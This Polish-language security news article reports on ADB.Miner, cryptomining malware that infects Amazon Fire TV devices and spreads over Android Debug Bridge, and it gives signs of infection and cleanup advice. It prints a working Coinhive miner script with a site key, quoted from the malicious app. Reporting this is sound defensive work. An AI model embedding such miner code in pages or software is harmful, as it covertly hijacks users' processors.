Niezależnie od urządzenia, na którym jest zainstalowany Android, to ciągle ten sam stary zielony robot, który może zawierać różne nakładki graficznie wyglądem nieprzypominające oryginalny system. Pod względem bezpieczeństwa Android nie ma łatwego życia, a i tym razem autorzy malware wzięli na cel przystawki telewizyjne Amazon Fire TV Stick rozszerzające możliwości zwykłych telewizorów.
Użytkownicy forum XDA zgłaszają problemy z wydajnością Amazon Fire TV, podejrzewając problemy z bezpieczeństwem. I nie mylą się, o czym świadczy kod zawarty w złośliwej aplikacji:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf',{
threads:3,
throttle: 0.6
});
miner.start();
</script>
Amazon Fire TV oraz Amazon Fire TV Stick są infekowane przez malware ADB.Miner, które instaluje się w systemie jako aplikacja „TEST”.
Nie wiadomo gdzie dokładnie jest jej źródło, ale podejrzewa się nieoficjalne lub zcrackowane oprogramowanie do oglądania kanałów telewizyjnych. Dodatkowo ADB.Miner niczym robak komputerowy może rozprzestrzeniać się na inne urządzenia z systemem Android w tej samej sieci. Zadanie ma jednak utrudnione, ponieważ na atakowanym smartfonie lub Smart TV musi być włączona funkcja debugowania (Android Debug Bridge) — chociaż nie zawsze, ponieważ robak potrafi włączyć taki komunikat:
Jak rozpoznać infekcję Amazon Fire TV Stick?
Jeżeli na ekranie zobaczysz aplikację „Test Ready to launch!”, to Twoje urządzenie jest zainfekowane. Szkodliwe oprogramowanie będzie wykorzystywać do 100% czasu procesora, a więc wszystkie inne zadania realizowane przez system będą znacznie ograniczone wydajnościowo.
W celu całkowitego pozbycia się szkodnika zaleca się przywrócenie ustawień fabrycznych i ponowne sprawowanie urządzeń Amazon z telewizorem. Potem należy jeszcze wyłączyć funkcję debugowania. Dodatkowo rekomendujemy instalację mobilnego oprogramowania antywirusowego dla systemu Android. Warto też ograniczyć instalowanie aplikacji niewiadomego pochodzenia, ponieważ do końca nie można mieć pewności, jaki kod może mieć w sobie zaszyty.
